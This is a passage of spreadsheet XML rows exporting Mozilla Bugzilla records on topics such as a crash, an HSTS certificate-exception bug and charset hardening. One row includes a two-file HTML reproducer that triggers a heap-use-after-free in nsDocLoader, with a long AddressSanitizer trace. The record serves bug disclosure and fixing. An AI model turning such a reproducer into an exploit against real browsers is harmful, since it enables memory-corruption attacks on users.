        <is>
          <t>2000-10-04 23:37:04 -0700</t>
        </is>
      </c>
      <c r="E2892" t="n">
        <v>1</v>
      </c>
      <c r="F2892" t="n">
        <v>1</v>
      </c>
      <c r="G2892" t="n">
        <v>3</v>
      </c>
      <c r="H2892" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2892" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2892" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K2892" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2892" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2892" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2892" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2892" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2892" t="inlineStr"/>
      <c r="Q2892" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2892" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2892" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2892" t="n">
        <v>1</v>
      </c>
      <c r="U2892" t="n">
        <v>0</v>
      </c>
      <c r="V2892" t="n">
        <v>18</v>
      </c>
      <c r="W2892" t="inlineStr">
        <is>
          <t>I had been successfully testing a local file copy of
  http://www.roving-mouse.com/planetary/sizes.html
and had given a Quit command.  It closed the browser window,
then it crashed before the windows behind it could refresh
their newly exposed regions.
I believe I had only been working with that page, and only
in the original browser window.</t>
        </is>
      </c>
      <c r="X2892" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2893">
      <c r="A2893" t="n">
        <v>38856</v>
      </c>
      <c r="B2893" t="inlineStr">
        <is>
          <t>2000-05-10 16:16:00 -0700</t>
        </is>
      </c>
      <c r="C2893" t="inlineStr">
        <is>
          <t>all bugzilla pages should specify charset</t>
        </is>
      </c>
      <c r="D2893" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:22 -0800</t>
        </is>
      </c>
      <c r="E2893" t="n">
        <v>1</v>
      </c>
      <c r="F2893" t="n">
        <v>1</v>
      </c>
      <c r="G2893" t="n">
        <v>4</v>
      </c>
      <c r="H2893" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2893" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2893" t="inlineStr">
        <is>
          <t>Documentation</t>
        </is>
      </c>
      <c r="K2893" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2893" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M2893" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N2893" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2893" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2893" t="inlineStr">
        <is>
          <t>security code</t>
        </is>
      </c>
      <c r="Q2893" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R2893" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2893" t="inlineStr">
        <is>
          <t>Bugzilla 2.14</t>
        </is>
      </c>
      <c r="T2893" t="n">
        <v>1</v>
      </c>
      <c r="U2893" t="n">
        <v>0</v>
      </c>
      <c r="V2893" t="n">
        <v>20</v>
      </c>
      <c r="W2893" t="inlineStr">
        <is>
          <t>to prevent untrusted content on bugzilla from executing possibly malicious 
javascript code, each page should include a charset at the top.
see http://www.cert.org/tech_tips/malicious_code_mitigation.html/#3</t>
        </is>
      </c>
      <c r="X2893" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2894">
      <c r="A2894" t="n">
        <v>415813</v>
      </c>
      <c r="B2894" t="inlineStr">
        <is>
          <t>2008-02-05 13:06:06 -0800</t>
        </is>
      </c>
      <c r="C2894" t="inlineStr">
        <is>
          <t>Implement Bug.update() as an API for WebServices</t>
        </is>
      </c>
      <c r="D2894" t="inlineStr">
        <is>
          <t>2011-09-23 15:41:12 -0700</t>
        </is>
      </c>
      <c r="E2894" t="n">
        <v>1</v>
      </c>
      <c r="F2894" t="n">
        <v>1</v>
      </c>
      <c r="G2894" t="n">
        <v>4</v>
      </c>
      <c r="H2894" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2894" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2894" t="inlineStr">
        <is>
          <t>WebService</t>
        </is>
      </c>
      <c r="K2894" t="inlineStr">
        <is>
          <t>3.1.3</t>
        </is>
      </c>
      <c r="L2894" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2894" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2894" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2894" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2894" t="inlineStr">
        <is>
          <t>[wanted-bmo][roadmap: 3.8]</t>
        </is>
      </c>
      <c r="Q2894" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2894" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2894" t="inlineStr">
        <is>
          <t>Bugzilla 4.0</t>
        </is>
      </c>
      <c r="T2894" t="n">
        <v>1</v>
      </c>
      <c r="U2894" t="n">
        <v>1</v>
      </c>
      <c r="V2894" t="n">
        <v>27</v>
      </c>
      <c r="W2894" t="inlineStr">
        <is>
          <t>We should now be able to update bugs using Webservice. That was the goal to implement $bug-&gt;update. The format could be of the form:
{ id =&gt; 106983, attributes =&gt; {status =&gt; 'NEW', priority =&gt; 'P3', severity =&gt; 'critical'} }
and Bug.update() would return all changes so that the caller can check what has been altered.
Probably not a blocker for 3.2 (despite I wouldn't be against), but definitely a highly wanted feature.</t>
        </is>
      </c>
      <c r="X2894" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2895">
      <c r="A2895" t="n">
        <v>1721220</v>
      </c>
      <c r="B2895" t="inlineStr">
        <is>
          <t>2021-07-19 10:04:15 -0700</t>
        </is>
      </c>
      <c r="C2895" t="inlineStr">
        <is>
          <t>TLS certificate exceptions are possible despite HSTS</t>
        </is>
      </c>
      <c r="D2895" t="inlineStr">
        <is>
          <t>2023-05-25 14:42:24 -0700</t>
        </is>
      </c>
      <c r="E2895" t="n">
        <v>1</v>
      </c>
      <c r="F2895" t="n">
        <v>1</v>
      </c>
      <c r="G2895" t="n">
        <v>3</v>
      </c>
      <c r="H2895" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2895" t="inlineStr">
        <is>
          <t>GeckoView</t>
        </is>
      </c>
      <c r="J2895" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2895" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2895" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2895" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N2895" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2895" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2895" t="inlineStr">
        <is>
          <t>[geckoview:m100] [geckoview:m101] [geckoview:m102][adv-main102+]</t>
        </is>
      </c>
      <c r="Q2895" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2895" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S2895" t="inlineStr">
        <is>
          <t>102 Branch</t>
        </is>
      </c>
      <c r="T2895" t="n">
        <v>1</v>
      </c>
      <c r="U2895" t="n">
        <v>0</v>
      </c>
      <c r="V2895" t="n">
        <v>22</v>
      </c>
      <c r="W2895" t="inlineStr">
        <is>
          <t>On Firefox 90 for Android and Nightly, on websites where previously an [HSTS](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Strict-Transport-Security) header has been received and is still an effect, certificate errors have an "Accept the Risk and Continue" button. 
As per [RFC 6797 Section 12.1](https://datatracker.ietf.org/doc/html/rfc6797#section-12.1) of the HSTS specification, such a button should not be present:
&gt;  Failing secure connection establishment on any warnings or errors
   (per Section 8.4 ("Errors in Secure Transport Establishment")) should
   be done with "no user recourse".  This means that the user should not
   be presented with a dialog giving her the option to proceed.  Rather,
   it should be treated similarly to a server error where there is
   nothing further the user can do with respect to interacting with the
   target web application, other than wait and retry.
In Firefox Desktop, this is done correctly and it is not possible proceed to the web page if certificate validation fails:
https://gitlab.com/uploads/-/system/user/1406255/480f835f498d94c1b8576e52216345ac/ff.png
## Steps to Reproduce - includeSubDomains
1. Go to https://tocco.ch to pick up the following HSTS header:
   `Strict-Transport-Security: max-age=2592000;includeSubDomains`
2. Go to http://abc.tocco.ch. As requested by the HSTS header, the request is upgraded to HTTPS and a certificate error is shown. It's possible to continue, however.
Here we use a domain that uses includeSubDomains as it is easier to reproduce; there is no need to replace the certificate after fetching the HSTS header. However, I also tried this on a page without includeSubDomains by temporarily replacing the certificate with a invalid one. The result was the same.
## Steps to Reproduce - Preloaded
1. Go to https://may.arbitrary.ch. Incorrectly, an "Accept the Risk and Continue" presented. The button (luckily) doesn't actually work.
arbitrary.ch is on the [HSTS preload list](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Strict-Transport-Security#preloading_strict_transport_security) and it should be impossible to visit it or any subdomain if a certificate error is presented.</t>
        </is>
      </c>
      <c r="X2895" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2896">
      <c r="A2896" t="n">
        <v>918864</v>
      </c>
      <c r="B2896" t="inlineStr">
        <is>
          <t>2013-09-20 09:03:25 -0700</t>
        </is>
      </c>
      <c r="C2896" t="inlineStr">
        <is>
          <t>[FIX] Heap-use-after-free in nsDocLoader::doStopDocumentLoad()</t>
        </is>
      </c>
      <c r="D2896" t="inlineStr">
        <is>
          <t>2024-05-30 08:07:41 -0700</t>
        </is>
      </c>
      <c r="E2896" t="n">
        <v>1</v>
      </c>
      <c r="F2896" t="n">
        <v>1</v>
      </c>
      <c r="G2896" t="n">
        <v>3</v>
      </c>
      <c r="H2896" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2896" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2896" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K2896" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2896" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2896" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2896" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2896" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2896" t="inlineStr">
        <is>
          <t>[asan][adv-main25+][adv-esr1710+][adv-esr24-1+]</t>
        </is>
      </c>
      <c r="Q2896" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2896" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2896" t="inlineStr">
        <is>
          <t>mozilla27</t>
        </is>
      </c>
      <c r="T2896" t="n">
        <v>1</v>
      </c>
      <c r="U2896" t="n">
        <v>0</v>
      </c>
      <c r="V2896" t="n">
        <v>21</v>
      </c>
      <c r="W2896" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36
Steps to reproduce:
Heap-use-after-free in nsDocLoader::doStopDocumentLoad().
Tested on asan firefox build (1377823661 and 1379548174) and 23.0 (crashed).
OS : Debian 7.1 and Ubuntu 10.04 LTS
Please put a.html and b.html in the same directory, and open a.html.
=== a.html ===
&lt;html&gt;                                                                                                                                                                  
&lt;script&gt;                                                                                                                                                                
function killChildFrame() {                                                                                                                                             
    window[0].home();                                                                                                                                                   
    document.body.removeChild(document.getElementsByTagName('iframe')[0]);                                                                                              
}                                                                                                                                                                       
&lt;/script&gt;                                                                                                                                                               
&lt;iframe src="b.html"&gt;&lt;/iframe&gt;                                                                                                                                          
&lt;/html&gt;                                                                                                                                                                 
=== b.html ===
&lt;html manifest="x"&gt;                                                                                                                                                     
&lt;script&gt;                                                                                                                                                                
window.applicationCache.onchecking = function() {                                                                                                                       
    parent.killChildFrame();                                                                                                                                            
}                                                                                                                                                                                                                                                                                                                        
&lt;/script&gt;                                                                                                                                                               
&lt;/html&gt;                                                                                                                                                                 
Actual results:
==18678==ERROR: AddressSanitizer: heap-use-after-free on address 0x6060009b8100 at pc 0x7f3781adb4e0 bp 0x7fff04361db0 sp 0x7fff04361da8
READ of size 8 at 0x6060009b8100 thread T0
    #0 0x7f3781adb4df in ~nsCOMPtr /dist/include/nsCOMPtr.h:430
    #1 0x7f3781ada6a3 in nsDocLoader::doStopDocumentLoad(nsIRequest*, tag_nsresult) /builds/slave/m-cen-l64-asan-000000000000000/build/uriloader/base/nsDocLoader.cpp:865
    #2 0x7f3781ad832f in nsDocLoader::DocLoaderIsEmpty(bool) /builds/slave/m-cen-l64-asan-000000000000000/build/uriloader/base/nsDocLoader.cpp:755
    #3 0x7f3781ad98aa in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) /builds/slave/m-cen-l64-asan-000000000000000/build/uriloader/base/nsDocLoader.cpp:639
    #4 0x7f3781ada159 in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) /builds/slave/m-cen-l64-asan-000000000000000/build/uriloader/base/nsDocLoader.cpp:642
    #5 0x7f377f3b4106 in nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, tag_nsresult) /builds/slave/m-cen-l64-asan-000000000000000/build/netwerk/base/src/nsLoadGroup.cpp:687
    #6 0x7f37804bfdaa in nsDocument::DoUnblockOnload() /builds/slave/m-cen-l64-asan-000000000000000/build/content/base/src/nsDocument.cpp:7999
    #7 0x7f37804bf8af in nsDocument::UnblockOnload(bool) /builds/slave/m-cen-l64-asan-000000000000000/build/content/base/src/nsDocument.cpp:7927
    #8 0x7f378049e862 in nsDocument::DispatchContentLoadedEvents() /builds/slave/m-cen-l64-asan-000000000000000/build/content/base/src/nsDocument.cpp:4713
    #9 0x7f37804e53bc in nsRunnableMethodImpl&lt;void (nsDocument::*)(), true&gt;::Run() /dist/include/nsThreadUtils.h:363
    #10 0x7f37836d4ba9 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-000000000000000/build/xpcom/threads/nsThread.cpp:622
    #11 0x7f37835fe016 in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/obj-firefox/xpcom/build/nsThreadUtils.cpp:238
    #12 0x7f3781c36dbc in nsXULWindow::ShowModal() /builds/slave/m-cen-l64-asan-000000000000000/build/xpfe/appshell/src/nsXULWindow.cpp:365
    #13 0x7f3781b79015 in nsWindowWatcher::OpenWindowInternal(nsIDOMWindow*, char const*, char const*, char const*, bool, bool, bool, nsIArray*, nsIDOMWindow**) /builds/slave/m-cen-l64-asan-000000000000000/build/embedding/components/windowwatcher/src/nsWindowWatcher.cpp:998
    #14 0x7f3781b74558 in nsWindowWatcher::OpenWindow(nsIDOMWindow*, char const*, char const*, char const*, nsISupports*, nsIDOMWindow**) /builds/slave/m-cen-l64-asan-000000000000000/build/embedding/components/windowwatcher/src/nsWindowWatcher.cpp:344
    #15 0x7f378371c551 in NS_InvokeByIndex /builds/slave/m-cen-l64-asan-000000000000000/build/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:162
    #16 0x7f37819aa26e in CallMethodHelper::Invoke() /builds/slave/m-cen-l64-asan-000000000000000/build/js/xpconnect/src/XPCWrappedNative.cpp:2809
    #17 0x7f37819bbfbb in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1316
    #18 0x7f3784f6e27a in JSFunction::native() const /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/jscntxtinlines.h:219
    #19 0x7f3784f61352 in Interpret(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/vm/Interpreter.cpp:2484
    #20 0x7f3784f4fd51 in js::RunScript(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/vm/Interpreter.cpp:446
    #21 0x7f3784f6e4b3 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/vm/Interpreter.cpp:508
    #22 0x7f3784f6f298 in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/vm/Interpreter.cpp:539
    #23 0x7f378517fce7 in JS_CallFunctionValue(JSContext*, JSObject*, JS::Value, unsigned int, JS::Value*, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/jsapi.cpp:5420
    #24 0x7f3781997416 in nsXPCWrappedJSClass::CallMethod(nsXPCWrappedJS*, unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) /builds/slave/m-cen-l64-asan-000000000000000/build/js/xpconnect/src/XPCWrappedJSClass.cpp:1445
    #25 0x7f378198ab3f in nsXPCWrappedJS::CallMethod(unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) /builds/slave/m-cen-l64-asan-000000000000000/build/js/xpconnect/src/XPCWrappedJS.cpp:587
    #26 0x7f378371d73a in PrepareAndDispatch /builds/slave/m-cen-l64-asan-000000000000000/build/xpcom/reflect/xptcall/src/md/unix/xptcstubs_x86_64_linux.cpp:122
    #27 0x7f378371c786 in SharedStub /builds/slave/m-cen-l64-asan-000000000000000/build/xpcom/reflect/xptcall/src/md/unix/xptcstubs_x86_64_linux.cpp:0
0x6060009b8100 is located 0 bytes inside of 64-byte region [0x6060009b8100,0x6060009b8140)
freed by thread T0 here:
    #0 0x446015 in __interceptor_free _asan_rtl_
    #1 0x7f3781b4791d in nsAutoRefCnt::operator=(unsigned int) /dist/include/mozilla/mozalloc.h:225
    #2 0x7f3781adb34f in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, tag_nsresult) /builds/slave/m-cen-l64-asan-000000000000000/build/uriloader/base/nsDocLoader.cpp:1331
    #3 0x7f3781ada6a3 in nsDocLoader::doStopDocumentLoad(nsIRequest*, tag_nsresult) /builds/slave/m-cen-l64-asan-000000000000000/build/uriloader/base/nsDocLoader.cpp:865
    #4 0x7f3781ad832f in nsDocLoader::DocLoaderIsEmpty(bool) /builds/slave/m-cen-l64-asan-000000000000000/build/uriloader/base/nsDocLoader.cpp:755
    #5 0x7f3781ad98aa in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) /builds/slave/m-cen-l64-asan-000000000000000/build/uriloader/base/nsDocLoader.cpp:639
    #6 0x7f3781ada159 in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) /builds/slave/m-cen-l64-asan-000000000000000/build/uriloader/base/nsDocLoader.cpp:642
    #7 0x7f37804bfdaa in nsDocument::DoUnblockOnload() /builds/slave/m-cen-l64-asan-000000000000000/build/content/base/src/nsDocument.cpp:7999
    #8 0x7f37804bf8af in nsDocument::UnblockOnload(bool) /builds/slave/m-cen-l64-asan-000000000000000/build/content/base/src/nsDocument.cpp:7927
    #9 0x7f378049e862 in nsDocument::DispatchContentLoadedEvents() /builds/slave/m-cen-l64-asan-000000000000000/build/content/base/src/nsDocument.cpp:4713
    #10 0x7f37804e53bc in nsRunnableMethodImpl&lt;void (nsDocument::*)(), true&gt;::Run() /dist/include/nsThreadUtils.h:363
    #11 0x7f37835fe016 in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/obj-firefox/xpcom/build/nsThreadUtils.cpp:238
    #12 0x7f3781c36dbc in nsXULWindow::ShowModal() /builds/slave/m-cen-l64-asan-000000000000000/build/xpfe/appshell/src/nsXULWindow.cpp:365
    #13 0x7f3781b79015 in nsWindowWatcher::OpenWindowInternal(nsIDOMWindow*, char const*, char const*, char const*, bool, bool, bool, nsIArray*, nsIDOMWindow**) /builds/slave/m-cen-l64-asan-000000000000000/build/embedding/components/windowwatcher/src/nsWindowWatcher.cpp:998
    #14 0x7f3781b74558 in nsWindowWatcher::OpenWindow(nsIDOMWindow*, char const*, char const*, char const*, nsISupports*, nsIDOMWindow**) /builds/slave/m-cen-l64-asan-000000000000000/build/embedding/components/windowwatcher/src/nsWindowWatcher.cpp:344
    #15 0x7f378371c551 in NS_InvokeByIndex /builds/slave/m-cen-l64-asan-000000000000000/build/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:162
    #16 0x7f37819aa26e in CallMethodHelper::Invoke() /builds/slave/m-cen-l64-asan-000000000000000/build/js/xpconnect/src/XPCWrappedNative.cpp:2809
    #17 0x7f37819bbfbb in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1316
    #18 0x7f3784f6e27a in JSFunction::native() const /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/jscntxtinlines.h:219
    #19 0x7f3784f61352 in Interpret(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/vm/Interpreter.cpp:2484
    #20 0x7f3784f4fd51 in js::RunScript(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/vm/Interpreter.cpp:446
    #21 0x7f3784f6e4b3 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/vm/Interpreter.cpp:508
    #22 0x7f3784f6f298 in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/vm/Interpreter.cpp:539
    #23 0x7f378517fce7 in JS_CallFunctionValue(JSContext*, JSObject*, JS::Value, unsigned int, JS::Value*, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/jsapi.cpp:5420
    #24 0x7f3781997416 in nsXPCWrappedJSClass::CallMethod(nsXPCWrappedJS*, unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) /builds/slave/m-cen-l64-asan-000000000000000/build/js/xpconnect/src/XPCWrappedJSClass.cpp:1445
    #25 0x7f378198ab3f in nsXPCWrappedJS::CallMethod(unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) /builds/slave/m-cen-l64-asan-000000000000000/build/js/xpconnect/src/XPCWrappedJS.cpp:587
    #26 0x7f378371d73a in PrepareAndDispatch /builds/slave/m-cen-l64-asan-000000000000000/build/xpcom/reflect/xptcall/src/md/unix/xptcstubs_x86_64_linux.cpp:122
    #27 0x7f378371c786 in SharedStub /builds/slave/m-cen-l64-asan-000000000000000/build/xpcom/reflect/xptcall/src/md/unix/xptcstubs_x86_64_linux.cpp:0
    #28 0x7f378371c551 in NS_InvokeByIndex /builds/slave/m-cen-l64-asan-000000000000000/build/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:162
    #29 0x7f37819aa26e in CallMethodHelper::Invoke() /builds/slave/m-cen-l64-asan-000000000000000/build/js/xpconnect/src/XPCWrappedNative.cpp:2809
previously allocated by thread T0 here:
    #0 0x446155 in __interceptor_malloc _asan_rtl_
    #1 0x7f378865b5c8 in moz_xmalloc /builds/slave/m-cen-l64-asan-000000000000000/build/memory/mozalloc/mozalloc.cpp:54
    #2 0x7f37803d493e in nsContentSink::ProcessOfflineManifest(nsAString_internal const&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/content/base/src/nsContentSink.cpp:1108
    #3 0x7f378127360b in nsHtml5SpeculativeLoad::Perform(nsHtml5TreeOpExecutor*) /builds/slave/m-cen-l64-asan-000000000000000/build/parser/html/nsHtml5SpeculativeLoad.cpp:45
    #4 0x7f37813095f7 in nsHtml5TreeOpExecutor::RunFlushLoop() /builds/slave/m-cen-l64-asan-000000000000000/build/parser/html/nsHtml5TreeOpExecutor.cpp:507
    #5 0x7f3781283288 in nsHtml5ExecutorFlusher::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/parser/html/nsHtml5StreamParser.cpp:131
    #6 0x7f37835fe016 in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/obj-firefox/xpcom/build/nsThreadUtils.cpp:238
    #7 0x7f3781c36dbc in nsXULWindow::ShowModal() /builds/slave/m-cen-l64-asan-000000000000000/build/xpfe/appshell/src/nsXULWindow.cpp:365
    #8 0x7f3781b79015 in nsWindowWatcher::OpenWindowInternal(nsIDOMWindow*, char const*, char const*, char const*, bool, bool, bool, nsIArray*, nsIDOMWindow**) /builds/slave/m-cen-l64-asan-000000000000000/build/embedding/components/windowwatcher/src/nsWindowWatcher.cpp:998
    #9 0x7f3781b74558 in nsWindowWatcher::OpenWindow(nsIDOMWindow*, char const*, char const*, char const*, nsISupports*, nsIDOMWindow**) /builds/slave/m-cen-l64-asan-000000000000000/build/embedding/components/windowwatcher/src/nsWindowWatcher.cpp:344
    #10 0x7f378371c551 in NS_InvokeByIndex /builds/slave/m-cen-l64-asan-000000000000000/build/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:162
    #11 0x7f37819aa26e in CallMethodHelper::Invoke() /builds/slave/m-cen-l64-asan-000000000000000/build/js/xpconnect/src/XPCWrappedNative.cpp:2809
    #12 0x7f37819bbfbb in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1316
    #13 0x7f3784f6e27a in JSFunction::native() const /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/jscntxtinlines.h:219
    #14 0x7f3784f61352 in Interpret(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/vm/Interpreter.cpp:2484
    #15 0x7f3784f4fd51 in js::RunScript(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/vm/Interpreter.cpp:446
    #16 0x7f3784f6e4b3 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/vm/Interpreter.cpp:508
    #17 0x7f3784f6f298 in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/vm/Interpreter.cpp:539
    #18 0x7f378517fce7 in JS_CallFunctionValue(JSContext*, JSObject*, JS::Value, unsigned int, JS::Value*, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/jsapi.cpp:5420
    #19 0x7f3781997416 in nsXPCWrappedJSClass::CallMethod(nsXPCWrappedJS*, unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) /builds/slave/m-cen-l64-asan-000000000000000/build/js/xpconnect/src/XPCWrappedJSClass.cpp:1445
    #20 0x7f378198ab3f in nsXPCWrappedJS::CallMethod(unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) /builds/slave/m-cen-l64-asan-000000000000000/build/js/xpconnect/src/XPCWrappedJS.cpp:587
    #21 0x7f378371d73a in PrepareAndDispatch /builds/slave/m-cen-l64-asan-000000000000000/build/xpcom/reflect/xptcall/src/md/unix/xptcstubs_x86_64_linux.cpp:122
    #22 0x7f378371c786 in SharedStub /builds/slave/m-cen-l64-asan-000000000000000/build/xpcom/reflect/xptcall/src/md/unix/xptcstubs_x86_64_linux.cpp:0
    #23 0x7f378371c551 in NS_InvokeByIndex /builds/slave/m-cen-l64-asan-000000000000000/build/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:162
    #24 0x7f37819aa26e in CallMethodHelper::Invoke() /builds/slave/m-cen-l64-asan-000000000000000/build/js/xpconnect/src/XPCWrappedNative.cpp:2809
    #25 0x7f37819bbfbb in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1316
    #26 0x7f3784f6e27a in JSFunction::native() const /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/jscntxtinlines.h:219
    #27 0x7f3784f61352 in Interpret(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/vm/Interpreter.cpp:2484
    #28 0x7f3784f4fd51 in js::RunScript(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/vm/Interpreter.cpp:446
    #29 0x7f3784f6e4b3 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/vm/Interpreter.cpp:508
